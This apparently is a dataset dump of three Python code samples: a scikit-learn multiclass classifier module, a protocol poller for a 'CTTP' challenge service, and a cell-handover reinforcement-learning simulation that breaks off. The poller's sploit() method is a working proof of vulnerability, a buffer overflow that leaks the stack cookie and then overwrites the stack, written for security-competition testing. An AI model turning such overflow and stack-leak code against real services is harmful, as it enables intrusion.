gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
"""
Multiclass and multilabel classification strategies
===================================================
This module implements multiclass learning algorithms:
- one-vs-the-rest / one-vs-all
- one-vs-one
- error correcting output codes
The estimators provided in this module are meta-estimators: they require a base
estimator to be provided in their constructor. For example, it is possible to
use these estimators to turn a binary classifier or a regressor into a
multiclass classifier. It is also possible to use these estimators with
multiclass estimators in the hope that their accuracy or runtime performance
improves.
All classifiers in scikit-learn implement multiclass classification; you
only need to use this module if you want to experiment with custom multiclass
strategies.
The one-vs-the-rest meta-classifier also implements a `predict_proba` method,
so long as such a method is implemented by the base classifier. This method
returns probabilities of class membership in both the single label and
multilabel case. Note that in the multilabel case, probabilities are the
marginal probability that a given sample falls in the given class. As such, in
the multilabel case the sum of these probabilities over all possible labels
for a given sample *will not* sum to unity, as they do in the single label
case.
"""
# Author: Mathieu Blondel <mathieu@mblondel.org>
# Author: Hamzeh Alsalhi <93hamsal@gmail.com>
#
# License: BSD 3 clause
import array
import numpy as np
import warnings
import scipy.sparse as sp
from .base import BaseEstimator, ClassifierMixin, clone, is_classifier
from .base import MetaEstimatorMixin
from .preprocessing import LabelBinarizer
from .metrics.pairwise import euclidean_distances
from .utils import check_random_state
from .utils.validation import (
_num_samples,
check_consistent_length,
check_is_fitted)
from .utils import deprecated
from .externals.joblib import Parallel
from .externals.joblib import delayed
__all__ = [
"OneVsRestClassifier",
"OneVsOneClassifier",
"OutputCodeClassifier",
]
def _fit_binary(estimator, X, y, classes=None):
"""Fit a single binary estimator."""
unique_y = np.unique(y)
if len(unique_y) == 1:
if classes is not None:
if y[0] == -1:
c = 0
else:
c = y[0]
warnings.warn("Label %s is present in all training examples." %
str(classes[c]))
estimator = _ConstantPredictor().fit(X, unique_y)
else:
estimator = clone(estimator)
estimator.fit(X, y)
return estimator
def _predict_binary(estimator, X):
"""Make predictions using a single binary estimator."""
try:
score = np.ravel(estimator.decision_function(X))
except (AttributeError, NotImplementedError):
# probabilities of the positive class
score = estimator.predict_proba(X)[:, 1]
return score
def _check_estimator(estimator):
"""Make sure that an estimator implements the necessary methods."""
if (not hasattr(estimator, "decision_function") and
not hasattr(estimator, "predict_proba")):
raise ValueError("The base estimator should implement "
"decision_function or predict_proba!")
@deprecated("fit_ovr is deprecated and will be removed in 0.18."
"Use the OneVsRestClassifier instead.")
def fit_ovr(estimator, X, y, n_jobs=1):
"""Fit a one-vs-the-rest strategy.
Parameters
----------
estimator : estimator object
An estimator object implementing `fit` and one of `decision_function`
or `predict_proba`.
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
y : (sparse) array-like, shape = [n_samples] or [n_samples, n_classes]
Multi-class targets. An indicator matrix turns on multilabel
classification.
Returns
-------
estimators : list of estimators object
The list of fitted estimator.
lb : fitted LabelBinarizer
"""
ovr = OneVsRestClassifier(estimator, n_jobs=n_jobs).fit(X, y)
return ovr.estimators_, ovr.label_binarizer_
@deprecated("predict_ovr is deprecated and will be removed in 0.18."
"Use the OneVsRestClassifier instead.")
def predict_ovr(estimators, label_binarizer, X):
"""Predict multi-class targets using the one vs rest strategy.
Parameters
----------
estimators : list of `n_classes` estimators, Estimators used for
predictions. The list must be homogeneous with respect to the type of
estimators. fit_ovr supplies this list as part of its output.
label_binarizer : LabelBinarizer object, Object used to transform
multiclass labels to binary labels and vice-versa. fit_ovr supplies
this object as part of its output.
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
Returns
-------
y : (sparse) array-like, shape = [n_samples] or [n_samples, n_classes].
Predicted multi-class targets.
"""
e_types = set([type(e) for e in estimators if not
isinstance(e, _ConstantPredictor)])
if len(e_types) > 1:
raise ValueError("List of estimators must contain estimators of the"
" same type but contains types {0}".format(e_types))
ovr = OneVsRestClassifier(clone(estimators[0]))
ovr.estimators_ = estimators
ovr.label_binarizer_ = label_binarizer
return ovr.predict(X)
@deprecated("predict_proba_ovr is deprecated and will be removed in 0.18."
"Use the OneVsRestClassifier instead.")
def predict_proba_ovr(estimators, X, is_multilabel):
e_types = set([type(e) for e in estimators if not
isinstance(e, _ConstantPredictor)])
if len(e_types) > 1:
raise ValueError("List of estimators must contain estimators of the"
" same type but contains types {0}".format(e_types))
Y = np.array([e.predict_proba(X)[:, 1] for e in estimators]).T
if not is_multilabel:
# Then, probabilities should be normalized to 1.
Y /= np.sum(Y, axis=1)[:, np.newaxis]
return Y
class _ConstantPredictor(BaseEstimator):
def fit(self, X, y):
self.y_ = y
return self
def predict(self, X):
check_is_fitted(self, 'y_')
return np.repeat(self.y_, X.shape[0])
def decision_function(self, X):
check_is_fitted(self, 'y_')
return np.repeat(self.y_, X.shape[0])
def predict_proba(self, X):
check_is_fitted(self, 'y_')
return np.repeat([np.hstack([1 - self.y_, self.y_])],
X.shape[0], axis=0)
class OneVsRestClassifier(BaseEstimator, ClassifierMixin, MetaEstimatorMixin):
"""One-vs-the-rest (OvR) multiclass/multilabel strategy
Also known as one-vs-all, this strategy consists in fitting one classifier
per class. For each classifier, the class is fitted against all the other
classes. In addition to its computational efficiency (only `n_classes`
classifiers are needed), one advantage of this approach is its
interpretability. Since each class is represented by one and one classifier
only, it is possible to gain knowledge about the class by inspecting its
corresponding classifier. This is the most commonly used strategy for
multiclass classification and is a fair default choice.
This strategy can also be used for multilabel learning, where a classifier
is used to predict multiple labels for instance, by fitting on a 2-d matrix
in which cell [i, j] is 1 if sample i has label j and 0 otherwise.
In the multilabel learning literature, OvR is also known as the binary
relevance method.
Parameters
----------
estimator : estimator object
An estimator object implementing `fit` and one of `decision_function`
or `predict_proba`.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. If -1 all CPUs are used.
If 1 is given, no parallel computing code is used at all, which is
useful for debugging. For n_jobs below -1, (n_cpus + 1 + n_jobs) are
used. Thus for n_jobs = -2, all CPUs but one are used.
Attributes
----------
estimators_ : list of `n_classes` estimators
Estimators used for predictions.
classes_ : array, shape = [`n_classes`]
Class labels.
label_binarizer_ : LabelBinarizer object
Object used to transform multiclass labels to binary labels and
vice-versa.
multilabel_ : boolean
Whether a OneVsRestClassifier is a multilabel classifier.
"""
def __init__(self, estimator, n_jobs=1):
self.estimator = estimator
self.n_jobs = n_jobs
def fit(self, X, y):
"""Fit underlying estimators.
Parameters
----------
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
y : (sparse) array-like, shape = [n_samples] or [n_samples, n_classes]
Multi-class targets. An indicator matrix turns on multilabel
classification.
Returns
-------
self
"""
# A sparse LabelBinarizer, with sparse_output=True, has been shown to
# outpreform or match a dense label binarizer in all cases and has also
# resulted in less or equal memory consumption in the fit_ovr function
# overall.
self.label_binarizer_ = LabelBinarizer(sparse_output=True)
Y = self.label_binarizer_.fit_transform(y)
Y = Y.tocsc()
columns = (col.toarray().ravel() for col in Y.T)
# In cases where individual estimators are very fast to train setting
# n_jobs > 1 in can results in slower performance due to the overhead
# of spawning threads. See joblib issue #112.
self.estimators_ = Parallel(n_jobs=self.n_jobs)(delayed(_fit_binary)
(self.estimator, X, column,
classes=["not %s" % self.label_binarizer_.classes_[i],
self.label_binarizer_.classes_[i]])
for i, column in enumerate(columns))
return self
def predict(self, X):
"""Predict multi-class targets using underlying estimators.
Parameters
----------
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
Returns
-------
y : (sparse) array-like, shape = [n_samples] or [n_samples, n_classes].
Predicted multi-class targets.
"""
check_is_fitted(self, 'estimators_')
if (hasattr(self.estimators_[0], "decision_function") and
is_classifier(self.estimators_[0])):
thresh = 0
else:
thresh = .5
n_samples = _num_samples(X)
if self.label_binarizer_.y_type_ == "multiclass":
maxima = np.empty(n_samples, dtype=float)
maxima.fill(-np.inf)
argmaxima = np.zeros(n_samples, dtype=int)
for i, e in enumerate(self.estimators_):
pred = _predict_binary(e, X)
np.maximum(maxima, pred, out=maxima)
argmaxima[maxima == pred] = i
return self.label_binarizer_.classes_[np.array(argmaxima.T)]
else:
indices = array.array('i')
indptr = array.array('i', [0])
for e in self.estimators_:
indices.extend(np.where(_predict_binary(e, X) > thresh)[0])
indptr.append(len(indices))
data = np.ones(len(indices), dtype=int)
indicator = sp.csc_matrix((data, indices, indptr),
shape=(n_samples, len(self.estimators_)))
return self.label_binarizer_.inverse_transform(indicator)
def predict_proba(self, X):
"""Probability estimates.
The returned estimates for all classes are ordered by label of classes.
Note that in the multilabel case, each sample can have any number of
labels. This returns the marginal probability that the given sample has
the label in question. For example, it is entirely consistent that two
labels both have a 90% probability of applying to a given sample.
In the single label multiclass case, the rows of the returned matrix
sum to 1.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
T : (sparse) array-like, shape = [n_samples, n_classes]
Returns the probability of the sample for each class in the model,
where classes are ordered as they are in `self.classes_`.
"""
check_is_fitted(self, 'estimators_')
# Y[i,j] gives the probability that sample i has the label j.
# In the multi-label case, these are not disjoint.
Y = np.array([e.predict_proba(X)[:, 1] for e in self.estimators_]).T
if len(self.estimators_) == 1:
# Only one estimator, but we still want to return probabilities
# for two classes.
Y = np.concatenate(((1 - Y), Y), axis=1)
if not self.multilabel_:
# Then, probabilities should be normalized to 1.
Y /= np.sum(Y, axis=1)[:, np.newaxis]
return Y
def decision_function(self, X):
"""Returns the distance of each sample from the decision boundary for
each class. This can only be used with estimators which implement the
decision_function method.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
T : array-like, shape = [n_samples, n_classes]
"""
check_is_fitted(self, 'estimators_')
if not hasattr(self.estimators_[0], "decision_function"):
raise AttributeError(
"Base estimator doesn't have a decision_function attribute.")
return np.array([est.decision_function(X).ravel()
for est in self.estimators_]).T
@property
def multilabel_(self):
"""Whether this is a multilabel classifier"""
return self.label_binarizer_.y_type_.startswith('multilabel')
@property
def classes_(self):
return self.label_binarizer_.classes_
@property
def coef_(self):
check_is_fitted(self, 'estimators_')
if not hasattr(self.estimators_[0], "coef_"):
raise AttributeError(
"Base estimator doesn't have a coef_ attribute.")
return np.array([e.coef_.ravel() for e in self.estimators_])
@property
def intercept_(self):
check_is_fitted(self, 'estimators_')
if not hasattr(self.estimators_[0], "intercept_"):
raise AttributeError(
"Base estimator doesn't have an intercept_ attribute.")
return np.array([e.intercept_.ravel() for e in self.estimators_])
def _fit_ovo_binary(estimator, X, y, i, j):
"""Fit a single binary estimator (one-vs-one)."""
cond = np.logical_or(y == i, y == j)
y = y[cond]
y_binary = np.empty(y.shape, np.int)
y_binary[y == i] = 0
y_binary[y == j] = 1
ind = np.arange(X.shape[0])
return _fit_binary(estimator, X[ind[cond]], y_binary, classes=[i, j])
@deprecated("fit_ovo is deprecated and will be removed in 0.18."
"Use the OneVsOneClassifier instead.")
def fit_ovo(estimator, X, y, n_jobs=1):
ovo = OneVsOneClassifier(estimator, n_jobs=n_jobs).fit(X, y)
return ovo.estimators_, ovo.classes_
@deprecated("predict_ovo is deprecated and will be removed in 0.18."
"Use the OneVsOneClassifier instead.")
def predict_ovo(estimators, classes, X):
"""Make predictions using the one-vs-one strategy."""
e_types = set([type(e) for e in estimators if not
isinstance(e, _ConstantPredictor)])
if len(e_types) > 1:
raise ValueError("List of estimators must contain estimators of the"
" same type but contains types {0}".format(e_types))
ovo = OneVsOneClassifier(clone(estimators[0]))
ovo.estimators_ = estimators
ovo.classes_ = classes
return ovo.predict(X)
class OneVsOneClassifier(BaseEstimator, ClassifierMixin, MetaEstimatorMixin):
"""One-vs-one multiclass strategy
This strategy consists in fitting one classifier per class pair.
At prediction time, the class which received the most votes is selected.
Since it requires to fit `n_classes * (n_classes - 1) / 2` classifiers,
this method is usually slower than one-vs-the-rest, due to its
O(n_classes^2) complexity. However, this method may be advantageous for
algorithms such as kernel algorithms which don't scale well with
`n_samples`. This is because each individual learning problem only involves
a small subset of the data whereas, with one-vs-the-rest, the complete
dataset is used `n_classes` times.
Parameters
----------
estimator : estimator object
An estimator object implementing `fit` and one of `decision_function`
or `predict_proba`.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. If -1 all CPUs are used.
If 1 is given, no parallel computing code is used at all, which is
useful for debugging. For n_jobs below -1, (n_cpus + 1 + n_jobs) are
used. Thus for n_jobs = -2, all CPUs but one are used.
Attributes
----------
estimators_ : list of `n_classes * (n_classes - 1) / 2` estimators
Estimators used for predictions.
classes_ : numpy array of shape [n_classes]
Array containing labels.
"""
def __init__(self, estimator, n_jobs=1):
self.estimator = estimator
self.n_jobs = n_jobs
def fit(self, X, y):
"""Fit underlying estimators.
Parameters
----------
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
y : array-like, shape = [n_samples]
Multi-class targets.
Returns
-------
self
"""
y = np.asarray(y)
check_consistent_length(X, y)
self.classes_ = np.unique(y)
n_classes = self.classes_.shape[0]
self.estimators_ = Parallel(n_jobs=self.n_jobs)(
delayed(_fit_ovo_binary)(
self.estimator, X, y, self.classes_[i], self.classes_[j])
for i in range(n_classes) for j in range(i + 1, n_classes))
return self
def predict(self, X):
"""Predict multi-class targets using underlying estimators.
Parameters
----------
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
Returns
-------
y : numpy array of shape [n_samples]
Predicted multi-class targets.
"""
check_is_fitted(self, 'estimators_')
n_samples = X.shape[0]
n_classes = self.classes_.shape[0]
votes = np.zeros((n_samples, n_classes))
scores = np.zeros((n_samples, n_classes))
k = 0
for i in range(n_classes):
for j in range(i + 1, n_classes):
pred = self.estimators_[k].predict(X)
score = _predict_binary(self.estimators_[k], X)
scores[:, i] -= score
scores[:, j] += score
votes[pred == 0, i] += 1
votes[pred == 1, j] += 1
k += 1
# find all places with maximum votes per sample
maxima = votes == np.max(votes, axis=1)[:, np.newaxis]
# if there are ties, use scores to break them
if np.any(maxima.sum(axis=1) > 1):
scores[~maxima] = -np.inf
prediction = scores.argmax(axis=1)
else:
prediction = votes.argmax(axis=1)
return self.classes_[prediction]
@deprecated("fit_ecoc is deprecated and will be removed in 0.18."
"Use the OutputCodeClassifier instead.")
def fit_ecoc(estimator, X, y, code_size=1.5, random_state=None, n_jobs=1):
"""Fit an error-correcting output-code strategy.
Parameters
----------
estimator : estimator object
An estimator object implementing `fit` and one of `decision_function`
or `predict_proba`.
code_size : float, optional
Percentage of the number of classes to be used to create the code book.
random_state : numpy.RandomState, optional
The generator used to initialize the codebook. Defaults to
numpy.random.
Returns
--------
estimators : list of `int(n_classes * code_size)` estimators
Estimators used for predictions.
classes : numpy array of shape [n_classes]
Array containing labels.
code_book_ : numpy array of shape [n_classes, code_size]
Binary array containing the code of each class.
"""
ecoc = OutputCodeClassifier(estimator, random_state=random_state,
n_jobs=n_jobs).fit(X, y)
return ecoc.estimators_, ecoc.classes_, ecoc.code_book_
@deprecated("predict_ecoc is deprecated and will be removed in 0.18."
"Use the OutputCodeClassifier instead.")
def predict_ecoc(estimators, classes, code_book, X):
"""Make predictions using the error-correcting output-code strategy."""
ecoc = OutputCodeClassifier(clone(estimators[0]))
ecoc.classes_ = classes
ecoc.estimators_ = estimators
ecoc.code_book_ = code_book
return ecoc.predict(X)
class OutputCodeClassifier(BaseEstimator, ClassifierMixin, MetaEstimatorMixin):
"""(Error-Correcting) Output-Code multiclass strategy
Output-code based strategies consist in representing each class with a
binary code (an array of 0s and 1s). At fitting time, one binary
classifier per bit in the code book is fitted. At prediction time, the
classifiers are used to project new points in the class space and the class
closest to the points is chosen. The main advantage of these strategies is
that the number of classifiers used can be controlled by the user, either
for compressing the model (0 < code_size < 1) or for making the model more
robust to errors (code_size > 1). See the documentation for more details.
Parameters
----------
estimator : estimator object
An estimator object implementing `fit` and one of `decision_function`
or `predict_proba`.
code_size : float
Percentage of the number of classes to be used to create the code book.
A number between 0 and 1 will require fewer classifiers than
one-vs-the-rest. A number greater than 1 will require more classifiers
than one-vs-the-rest.
random_state : numpy.RandomState, optional
The generator used to initialize the codebook. Defaults to
numpy.random.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. If -1 all CPUs are used.
If 1 is given, no parallel computing code is used at all, which is
useful for debugging. For n_jobs below -1, (n_cpus + 1 + n_jobs) are
used. Thus for n_jobs = -2, all CPUs but one are used.
Attributes
----------
estimators_ : list of `int(n_classes * code_size)` estimators
Estimators used for predictions.
classes_ : numpy array of shape [n_classes]
Array containing labels.
code_book_ : numpy array of shape [n_classes, code_size]
Binary array containing the code of each class.
References
----------
.. [1] "Solving multiclass learning problems via error-correcting output
codes",
Dietterich T., Bakiri G.,
Journal of Artificial Intelligence Research 2,
1995.
.. [2] "The error coding method and PICTs",
James G., Hastie T.,
Journal of Computational and Graphical statistics 7,
1998.
.. [3] "The Elements of Statistical Learning",
Hastie T., Tibshirani R., Friedman J., page 606 (second-edition)
2008.
"""
def __init__(self, estimator, code_size=1.5, random_state=None, n_jobs=1):
self.estimator = estimator
self.code_size = code_size
self.random_state = random_state
self.n_jobs = n_jobs
def fit(self, X, y):
"""Fit underlying estimators.
Parameters
----------
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
y : numpy array of shape [n_samples]
Multi-class targets.
Returns
-------
self
"""
if self.code_size <= 0:
raise ValueError("code_size should be greater than 0, got {1}"
"".format(self.code_size))
_check_estimator(self.estimator)
random_state = check_random_state(self.random_state)
self.classes_ = np.unique(y)
n_classes = self.classes_.shape[0]
code_size_ = int(n_classes * self.code_size)
# FIXME: there are more elaborate methods than generating the codebook
# randomly.
self.code_book_ = random_state.random_sample((n_classes, code_size_))
self.code_book_[self.code_book_ > 0.5] = 1
if hasattr(self.estimator, "decision_function"):
self.code_book_[self.code_book_ != 1] = -1
else:
self.code_book_[self.code_book_ != 1] = 0
classes_index = dict((c, i) for i, c in enumerate(self.classes_))
Y = np.array([self.code_book_[classes_index[y[i]]]
for i in range(X.shape[0])], dtype=np.int)
self.estimators_ = Parallel(n_jobs=self.n_jobs)(
delayed(_fit_binary)(self.estimator, X, Y[:, i])
for i in range(Y.shape[1]))
return self
def predict(self, X):
"""Predict multi-class targets using underlying estimators.
Parameters
----------
X : (sparse) array-like, shape = [n_samples, n_features]
Data.
Returns
-------
y : numpy array of shape [n_samples]
Predicted multi-class targets.
"""
check_is_fitted(self, 'estimators_')
Y = np.array([_predict_binary(e, X) for e in self.estimators_]).T
pred = euclidean_distances(Y, self.code_book_).argmin(axis=1)
return self.classes_[pred]
|
|
#!/usr/bin/env python
#
# Copyright (C) 2014
# Brian Caswell <bmc@lungetech.com>
# Narf Industries <info@narfindustries.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import string
import sys
import os
from os.path import join,dirname,abspath
from generator.actions import Actions
from random import choice,randint
from struct import *
lehdr = "PTTC"
behdr = "CTTP"
INTERNALERR = "If anyone asks, you're my debugger.\x00"
SUBMITOK = "Oh, sure. Let the robot do all the work.\x00"
DELETEOK = "Hopes: deleted.\x00"
NOTIMPLEMENTED = "You want me to do *two* things?!\x00"
INFO = 0x4347C000
WARN = 0x4347C001
ERROR = 0x4347C002
def random_alpha(a, b):
return ''.join(choice(string.letters) for _ in range(randint(a, b)))
def chunks(l, n):
for i in xrange(0, len(l), n):
yield l[i:i+n]
class CTTP(Actions):
def start(self):
self.files = {}
def _retrieve(self, ver, code):
le = True
hdr = lehdr if le else behdr
fmt = "<4sIIIIII" if le else ">4sIIIIII"
path = random_alpha(10,100)
body = ""
pkt = pack(fmt, hdr, ver, code, len(path), len(body), 0, 0) + path + body
fmt = "<4sII" if le else ">4sII"
if path in self.files:
body = self.files[path]
code = 0xbaaaaaaa;
else:
body = INTERNALERR
code = 0xbaaaaaab;
return (pkt, pack(fmt, hdr, code, len(body)) + body)
def _submit(self, ver, code, body):
le = True
hdr = lehdr if le else behdr
fmt = "<4sIIIIII" if le else ">4sIIIIII"
path = random_alpha(10,100)
while path in self.files:
path = random_alpha(10,100)
pkt = pack(fmt, hdr, ver, code, len(path), len(body), 0, 0) + path + body
fmt = "<4sII" if le else ">4sII"
self.files[path] = body
code = 0xbaaaaaaa;
body = SUBMITOK
return (pkt, pack(fmt, hdr, code, len(body)) + body)
def _auth(self, ver, code):
le = True
hdr = lehdr if le else behdr
fmt = "<4sIIIIII" if le else ">4sIIIIII"
path = self.files.keys()[0]
body = ""
pkt = pack(fmt, hdr, ver, code, len(path), len(body), 0, 0) + path + body
fmt = "<4sII" if le else ">4sII"
#fixed in c file
challenge = "temp"
key = 0xff
encoded = challenge
token = 0xdeadbeef
etoken = pack("<I",token)
self.write(pkt)
self.read(length=len(challenge)+5+4, expect=pack("<BI",key,len(challenge))+encoded+etoken)
body = self.files[path]
code = 0xbaaaaaaa;
key = 0x00
body = "".join(chr(ord(i)^key) for i in body)
return (challenge+pack("<I",token^0x127a1b76), pack(fmt, hdr, code, len(body)) + body)
def _quit(self, ver, code):
le = True
hdr = lehdr if le else behdr
fmt = "<4sIIIIII" if le else ">4sIIIIII"
path = ""
body = ""
pkt = pack(fmt, hdr, ver, code, len(path), len(body), 0, 0) + path + body
resp = "done"
return (pkt, resp)
def do_auth(self):
code = 0x41414141
ver = 0x10000000
le = True
hdr = lehdr if le else behdr
fmt = "<4sIIIIII" if le else ">4sIIIIII"
path = random_alpha(10,100)
body = ""
pkt = pack(fmt, hdr, ver, code, len(path), len(body), 0, 0)
fmt = "<4sII" if le else ">4sII"
respbody = INTERNALERR
respcode = 0xbaaaaaab;
#fixed in c file
challenge = "temp"
key = 0xff
encoded = challenge
token = 0xdeadbeef
etoken = pack("<I",token)
self.write(pkt)
self.read(length=len(challenge)+5+4, expect=pack("<BI",key,len(challenge))+encoded+etoken)
self.write(challenge+pack("<I",token^0x127a1b76)+path+body)
resp = pack(fmt, hdr, respcode, len(respbody)) + respbody
self.read(length=len(resp), expect=resp)
def sploit(self):
self.do_auth()
#will overwrite s, leaking out 28 extra bytes of stack,
#encoded with single byte xor key from flag page
req, resp = self._submit(0x10000000, 0x41414142, "A"*4096+pack("<I",4096+28))
self.write(req)
self.read(length=len(resp), expect=resp)
#request file, leak stack cookie, valid fp, and valid cttpresp_t
#decoding logic added in c
req, resp = self._auth(0x10000002, 0x41414144)
self.write(req)
self.read(length=len(resp), expect=resp)
#reset, hack because laziness
self.files = {}
#submit file to prove vulnerability
req, resp = self._submit(0x10000000, 0x41414142,"A"*4096+pack("<I",4096)+"BBBBCCCCDDDDEEEEFFFF" + "SSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ")
self.write(req)
self.read(length=len(resp), expect=resp)
#pwn
req, resp = self._auth(0x10000002, 0x41414144)
self.write(req)
self.read(length=len(resp), expect=resp)
#quit
ver = 0x10000000
req, resp = self._quit(ver, 0x41414146)
self.write(req)
self.read(length=len(resp), expect=resp)
def quit(self):
pass
|
|
import sys
import random
import numpy as np
from constants import LOCAL_T_MAX
from collections import Counter
from math import exp
from constants import direction
from constants import direction_index
# 400 pixels represent the largest distance of the area, i.e. 100m
WINDOW_WIDTH = 400 *40 # size of window's width in pixels
WINDOW_HEIGHT = 400 *40# size of windows' height in pixels
cell_radius = 4 # "m" this is the radius of cell
resolution = cell_radius * 4./WINDOW_WIDTH # meter/pixel, the longest distace in the simulation system is "cell_radius * 4"
outlayer_userrange_x_low = -30 / resolution
outlayer_userrange_x_high = 30 / resolution
outlayer_userrange_y_low = -30 / resolution
outlayer_userrange_y_high = 30 / resolution
outer_radius = 50/ resolution
inner_radius = 22.5 / resolution
Num_CELL = 6
NUM_USER = 1 # In asynchronous deep Q learning, only one user in one thread
# generate cell list, every cell in the lists consists of 5 params:
# (1)loc_x(left) (2)loc_y(top) (3)cell_id
# :return: cell_list: (1)loc_x(left) (2)loc_y(top) (3)cell_id
# cell location
cell_id = np.arange(Num_CELL)
# the locations of cells are fixed and the coordinates are given
# cell_x = [200, 200, 370, 370, 200, 30, 30]
# cell_y = [200, 0, 100, 300, 400, 300, 100]
cell_x = [ 0.0, 170.0*40, 170.0*40, 0.0, -170*40, -170*40]
cell_y = [ 200.0*40, 100.0*40, -100.0*40, -200.0*40, -100*40, 100*40]
cells = np.vstack((cell_x, cell_y,cell_id)).T
# "action" is the "cell_id" selected by the agent
class SystemModel:
def __init__(self):
self.init_users()
self.s_t = self._get_state()
self.handover_indicator = 0 #np.zeros(LOCAL_T_MAX)
self.reward_handover = 0
self.handover_consumption =7.5
self.terminal = False
self.direction = direction
self.direction_index = direction_index
# def intialize_para(self):
# self.count_no_handover = 0
# self.count_no_failure = 0
# self.count_failure = 0
# self.count_handover_total=0
# self.count_handover = 0
def state_update(self, last_action, action):
"""
the func can generate the reward and state, also update the users locations
:param: users:the locations of the users
action: the "cell_id" selected by users
last_action
"""
self.rates = get_rate_percell(self.users, cells)
s_t = self._get_state()
r, rate = self._get_reward(last_action,action)
self.test_rates=self.rates
self._move_user()
self.rates = get_rate_percell(self.users, cells)
s_t1 = self._get_state()
self.reward = r
self.s_t = s_t
self.s_t1 = s_t1
self.rate = rate
def update(self):
self.s_t = self.s_t1
def _move_user(self):
"""
low mobility users are considered, i.e. the user only move one pixel every frame. different mobility trajectories will be tested to present the robustness of the neural network
"""
self.terminal = False
mobility_speed = 1 # np.random.randint(1, 3)
index = np.random.choice(self.direction_index, p=[0.25, 0.25, 0.25, 0.25])
self.users = self.users + self.direction[index] * mobility_speed
if np.abs(self.users[0]) > WINDOW_WIDTH/2or np.abs(self.users[1]) > WINDOW_WIDTH/2:#np.abs(self.users[0]) > np.sqrt(3)/2.0 * outer_radius or (np.abs(self.users[0])+np.abs(self.users[1])/np.sqrt(3)) > outer_radius: #and (np.abs(user_x_tmp) > np.sqrt(3)/2.0*inner_radius or (np.abs(user_x_tmp)+np.abs(user_y_tmp)/np.sqrt(3)) > inner_radius):
self.terminal = True
def _get_reward(self, last_action, action):
"""
:param users: the location of user before moving
:param action: the taken action to obtain "users"
:return: reward : the weighted sum of rate and reward for handover, i.e. "handover error occurs" -- 0, "handover successes" -- 1
"""
# reward_weight_rate =0.5
rate = self.rates[action]
# last_rate = self.rates[last_action]
if action == last_action:
self.handover_indicator = 0
# self.count_no_handover += 1.0
else:
self.handover_indicator = 1
# self.count_handover_total += 1.0
reward = rate - self.handover_indicator * self.handover_consumption
# if action == last_action and self.count_handover < LOCAL_T_MAX :#andrate >0.5
# self.reward_handover = 0.5
# self.handover_indicator[self.count_handover] = 0
# self.count_no_handover += 1.0
# self.count_handover +=1.0
# # if action == self.serve_cell_id and rate <0.5:
# # self.reward_handover = 0
# # self.handover_indicator[self.count_handover] = 0
# # self.count_handover += 1
# elif (self.handover_indicator[0] == 1 ):#or rate<0.5
# self.reward_handover = -1
# self.count_handover_total += 1.0
# self.count_handover = 0
# self.handover_indicator[self.count_handover] = 1
# elif self.handover_indicator[0] != 1 and rate > last_rate:#and rate>0.5
# self.reward_handover = 1
# self.count_handover = 0
# self.handover_indicator[self.count_handover] = 1
# self.count_handover_total += 1.0
# elif self.handover_indicator[0] != 1 and rate < last_rate:
# self.reward_handover = -1
# self.count_handover = 0
# self.handover_indicator[self.count_handover] = 1
# self.count_handover_total += 1.0
# self.reward_rate = rate - last_rate
# self.reward_rate = np.clip(differ_rate,-5,5)
# if action != last_action:
# self.count_handover += 1.0
# else:
# self.count_no_handover += 1.0
#
# if rate < last_rate:
#
# self.reward_rate = -0.1
#
# else:
# self.reward_rate = 0.1
self.serve_cell_id = action
# if rate > 1.5:
# self.count_no_failure +=1.0
# else:
# self.count_failure += 1.0
# if self.count_failure + self.count_no_failure == LOCAL_T_MAX:
# self.rate_fail_ratio = self.count_failure / (self.count_failure + self.count_no_failure)
# self.count_failure = 0.0
# self.count_no_failure = 0.0
# if rate > last_rate:
# reward_rate = 1
# elif rate == last_rate:
# reward_rate = 0
# elif rate < last_rate:
# reward_rate = -1
# if self.count_handover + self.count_no_handover < 1000:
# self.reward_handover = 0
# elif self.count_handover + self.count_no_handover == 1000:
#
# if self.count_handover/(self.count_no_handover+self.count_handover) > 0.01:
#
# self.reward_handover = -1.0
# else:
# self.reward_handover = 1.0
# if self.count_failure + self.count_no_failure < LOCAL_T_MAX:
# reward_rate = 0
# elif self.count_failure + self.count_no_failure == LOCAL_T_MAX:
#
# if self.count_failure / (self.count_failure + self.count_no_failure) > 0.1:
# reward_rate = -10
# else:
# reward_rate = 10
# self.count_failure = 0.0
# self.count_no_failure = 0.0
# print (reward_rate, self.reward_handover)
# diff_rate = 10*(rate-last_rate)
# reward = self.reward_handover
return reward, rate
def _get_state(self):
feature_serve_vector = np.zeros(Num_CELL)
feature_serve_vector[self.serve_cell_id] = 1
# feature_handover = np.zeros(2)
# if action == self.last_serve_cell_id: #self.reward_handover == 1:
# feature_handover[0] = 1
# else:
# feature_handover[1] = 1
# s_t = self.rates
s_t = np.hstack((self.rates,feature_serve_vector))#feature_user_rates_vector,feature_handover
# s_t = feature_user_rates_vector
return s_t
def init_users(self):
"""
initialize user. every user consists of 4 params:
